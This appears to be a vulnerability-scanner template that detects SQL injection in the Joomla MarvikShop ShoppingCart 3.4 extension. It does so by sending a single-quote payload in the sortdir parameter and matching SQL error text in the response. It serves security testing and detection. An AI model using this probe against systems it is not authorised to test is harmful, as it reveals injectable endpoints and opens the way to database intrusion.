id: joomla-marvikshop-sqli

info:
  name: Joomla MarvikShop ShoppingCart 3.4 - Sql Injection
  author: r3Y3r53
  severity: high
  description: |
    Joomla MarvikShop ShoppingCart 3.4 is vulnerable to SQL injection which is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.
  reference:
    - https://vulners.com/zdt/1337DAY-ID-38020
    - https://cxsecurity.com/issue/WLB-2022100015
    - https://extensions.joomla.org/
  metadata:
    verified: true
    max-request: 1
  tags: joomla,marvikshop,sqli,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "You have an error in your SQL syntax") && contains(body, "manufacturers_id") && contains(body, "products_price")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and

# digest: 4a0a00473045022100a3a76116b010421d53b19b5eecf9c3827b8155ef3f08e8956b2ea16266c6d99402205d8a9043b3eb5deb270495437a7a242c91ee13f07ca51c5a2e556826dcf51f92:922c64590222798bb761d5b6d8e72950